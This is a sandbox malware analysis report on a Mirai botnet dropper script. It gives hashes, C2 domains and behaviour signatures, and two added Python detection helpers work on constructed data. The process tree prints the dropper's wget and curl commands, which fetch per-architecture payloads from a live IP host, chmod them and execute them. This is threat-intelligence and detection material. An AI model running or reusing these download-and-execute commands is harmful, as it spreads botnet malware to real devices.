Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    29/12/2024, 21:33

General

  • Target

    51.79.141.121-sora.sh-2024-12-29T211113.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux botnet family that infects exposed network devices.

  • Mirai family
  • Contacts a large number (37233) of remote hosts 1 TTP

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows 1 TTP

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTP 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTP 28 IoCs

    Malware like Mirai disables the hardware watchdog so that it cannot reboot an infected system.

  • Enumerates active TCP sockets 1 TTP 13 IoCs

    Reads the list of active TCP sockets from the /proc virtual filesystem.

  • Writes file to system bin folder 14 IoCs
  • Changes its process name 14 IoCs
  • Reads system network configuration 1 TTP 13 IoCs

    Reads the /proc filesystem to enumerate the system's network settings.

  • System Network Configuration Discovery 1 TTP 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 24 IoCs

    Malware often drops the files it needs in the /tmp directory.
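
The two network signatures above are threshold heuristics over the sandbox's flow log: many distinct destinations from one source in a short time. The following is an added example, not code from the report or from Triage, that applies the same idea to a handful of constructed connection records. The record format, the thresholds, the function names and the sample records are all assumptions; it reports each source that contacts at least `min_distinct` distinct hosts inside a sliding time window, together with the port most of its flows target, which separates a one-service-across-many-hosts probe from ordinary client traffic.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # seconds since the start of the capture
    src: str
    dst: str
    dport: int
    proto: str


def parse_flow(line: str) -> Flow:
    """Parse one constructed record of the form '<ts> <src> <dst> <dport> <proto>'."""
    ts, src, dst, dport, proto = line.split()
    return Flow(float(ts), src, dst, int(dport), proto)


def detect_scanners(flows, window=60.0, min_distinct=100):
    """Flag sources that contact at least `min_distinct` distinct destination hosts
    within any `window`-second span.  Returns {src: (peak_distinct, top_port, share)}
    where `share` is the fraction of that source's flows aimed at `top_port`; a
    share near 1.0 means one service is being probed across many hosts, which is
    the shape of a Mirai-style scan rather than of ordinary client traffic."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)
    findings = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        in_window = Counter()          # dst -> flows currently inside the window
        lo, peak = 0, 0
        for f in fl:
            in_window[f.dst] += 1
            while f.ts - fl[lo].ts > window:   # evict records that fell out of the window
                old = fl[lo].dst
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= min_distinct:
            port, hits = Counter(f.dport for f in fl).most_common(1)[0]
            findings[src] = (peak, port, round(hits / len(fl), 2))
    return findings


def sample_flows():
    """Constructed records, not sandbox data: one host probing 150 distinct addresses
    on TCP/23 within 30 s, and one host making a few ordinary HTTPS connections."""
    lines = [f"{i * 0.2:.1f} 10.0.0.5 198.51.100.{i + 1} 23 tcp" for i in range(150)]
    lines += [
        "0.0 10.0.0.7 203.0.113.10 443 tcp",
        "1.5 10.0.0.7 203.0.113.10 443 tcp",
        "4.0 10.0.0.7 203.0.113.20 443 tcp",
        "9.2 10.0.0.7 203.0.113.30 443 tcp",
    ]
    return lines


if __name__ == "__main__":
    for src, (peak, port, share) in detect_scanners(map(parse_flow, sample_flows())).items():
        print(f"{src}: {peak} distinct hosts in window, {share:.0%} of flows to port {port}")
```

The window and the distinct-host threshold are the tuning knobs; the report's figure of 37233 hosts in about 150 seconds sits far above any sensible threshold, but a bot throttled to a slow scan needs a longer window to cross it.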

Processes

  • /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    1⤵
    • Writes file to tmp directory
    PID:1464
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1465
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1478
    • /bin/cat
      cat botx.x86
      2⤵
      PID:1485
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
      2⤵
      • File and Directory Permissions Modification
      PID:1486
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Changes its process name
      PID:1487
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:1489
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:1491
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
      2⤵
      • File and Directory Permissions Modification
      PID:1495
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1496
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86_64
      2⤵
      PID:1498
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86_64
      2⤵
      • Writes file to tmp directory
      PID:1499
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
      2⤵
      • File and Directory Permissions Modification
      PID:1503
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1504
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.i468
      2⤵
      PID:1506
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.i468
      2⤵
      • Writes file to tmp directory
      PID:1507
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
      2⤵
      • File and Directory Permissions Modification
      PID:1511
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1512
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.i686
      2⤵
      PID:1514
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.i686
      2⤵
      • Writes file to tmp directory
      PID:1515
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K
      2⤵
      • File and Directory Permissions Modification
      PID:1519
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1520
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1522
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.mpsl
      2⤵
      • Writes file to tmp directory
      PID:1527
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1529
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1530
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm4
      2⤵
      PID:1532
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm4
      2⤵
      • Writes file to tmp directory
      PID:1533
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1537
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1538
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm5
      2⤵
      • Writes file to tmp directory
      PID:1540
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm5
      2⤵
      • Writes file to tmp directory
      PID:1543
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1545
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1546
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm6
      2⤵
      • Writes file to tmp directory
      PID:1548
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm6
      2⤵
      • Writes file to tmp directory
      PID:1551
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1553
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1554
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm7
      2⤵
      • Writes file to tmp directory
      PID:1556
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm7
      2⤵
      • Writes file to tmp directory
      PID:1559
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1561
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1562
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.ppc
      2⤵
      • Writes file to tmp directory
      PID:1564
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.ppc
      2⤵
      • Writes file to tmp directory
      PID:1567
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1569
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1570
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.ppc440fp
      2⤵
      PID:1572
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.ppc440fp
      2⤵
      • Writes file to tmp directory
      PID:1573
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1577
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1578
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.m68k
      2⤵
      • Writes file to tmp directory
      PID:1580
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.m68k
      2⤵
      • Writes file to tmp directory
      PID:1583
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1585
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1586
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.sh4
      2⤵
      • Writes file to tmp directory
      PID:1588
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.sh4
      2⤵
      • Writes file to tmp directory
      PID:1591
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3
      2⤵
      • File and Directory Permissions Modification
      PID:1593
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:1594
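
The fourteen fetch, chmod, execute rounds above are one loop run once per CPU architecture, with wget and curl tried in turn for the same URL. The following is an added example, not code from the report or from Triage: a small triage helper that groups exec events by parent process and reports every parent whose children fetch from a URL, mark files executable and then run something from /tmp, reducing a tree like this one to the download server, the payload URLs, the architecture suffixes and the binary that was actually executed. The event layout, the function names and the constructed event list (which mirrors the tree above with synthetic PIDs and shortened chmod argument lists) are assumptions; chmod's file arguments are taken relative to /tmp, which the tree supports because the same parent then executes /tmp/robben.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Exec:
    pid: int
    ppid: int
    exe: str        # resolved image path, as the sandbox reports it
    cmdline: str


DOWNLOADERS = {"/usr/bin/wget", "/usr/bin/curl", "/usr/bin/tftp"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Payload suffixes in the order the tree above fetches them.
ARCH_SUFFIXES = ["x86", "mips", "x86_64", "i468", "i686", "mpsl", "arm4", "arm5",
                 "arm6", "arm7", "ppc", "ppc440fp", "m68k", "sh4"]


def arch_of(url: str):
    """'http://h/where/botx.x86_64' -> 'x86_64'; None when the file name has no suffix."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return name.split(".", 1)[1] if "." in name else None


def triage_droppers(events):
    """Return {ppid: summary} for every parent whose children show the
    fetch -> chmod +x -> execute-from-/tmp sequence (assumption: chmod runs with
    /tmp as its working directory, so its file arguments are /tmp/<name>)."""
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)
    findings = {}
    for ppid, kids in children.items():
        urls, chmodded, executed = [], set(), []
        for k in sorted(kids, key=lambda e: e.pid):
            if k.exe in DOWNLOADERS:
                urls += [u for u in URL_RE.findall(k.cmdline) if u not in urls]
            elif k.exe == "/bin/chmod":
                tokens = k.cmdline.split()
                if "+x" in tokens[1:]:                      # only symbolic +x is recognised
                    chmodded.update(t for t in tokens[1:] if t[0] not in "+-")
            elif k.exe.startswith("/tmp/") and k.exe[len("/tmp/"):] in chmodded:
                if k.exe not in executed:
                    executed.append(k.exe)
        if urls and chmodded and executed:
            hosts = sorted({urlparse(u).hostname or "" for u in urls})
            findings[ppid] = {
                "servers": hosts,
                "ip_literal_server": all(IPV4_RE.match(h) for h in hosts),
                "urls": urls,
                "archs": sorted({a for a in map(arch_of, urls) if a}),
                "executed": executed,
            }
    return findings


def sample_events():
    """Constructed excerpt modelled on the tree above: one parent fetches a payload per
    architecture with wget then curl, chmods its working directory and runs ./robben.
    PIDs are synthetic and the chmod file lists are shortened."""
    script = "51.79.141.121-sora.sh-2024-12-29T211113.sh"
    ev = [Exec(1464, 1, "/tmp/" + script, "/tmp/" + script)]
    pid = 1465
    for arch in ARCH_SUFFIXES:
        url = f"http://51.79.141.121/where/botx.{arch}"
        ev.append(Exec(pid, 1464, "/usr/bin/wget", f"wget {url}")); pid += 1
        ev.append(Exec(pid, 1464, "/usr/bin/curl", f"curl -O {url}")); pid += 1
        ev.append(Exec(pid, 1464, "/bin/chmod", f"chmod +x {script} botx.{arch} robben")); pid += 1
        ev.append(Exec(pid, 1464, "/tmp/robben", "./robben Payload")); pid += 1
    # An unrelated download with no chmod or execution afterwards must not be reported.
    ev.append(Exec(3000, 2999, "/usr/bin/curl", "curl -O https://example.org/notes.txt"))
    return ev


if __name__ == "__main__":
    for ppid, d in triage_droppers(sample_events()).items():
        print(f"parent {ppid}: {len(d['urls'])} payload URLs from {d['servers']} "
              f"(IP literal: {d['ip_literal_server']}), archs {d['archs']}, ran {d['executed']}")
```

Plain-HTTP fetches from an IP-literal host, a blanket `chmod +x` over /tmp and execution of a freshly chmodded file by the same parent are individually noisy but rarely occur together outside a dropper; a per-parent chain like this is a practical starting point for a Sigma or EDR rule on Linux hosts.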

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/botx.x86

    Filesize

    50KB

    MD5

    1092f7846a6ca7a5e92ece0ea93ff82e

    SHA1

    140fd3e84c49d382e6b0f9a40730d1cd465f8347

    SHA256

    a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

    SHA512

    11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba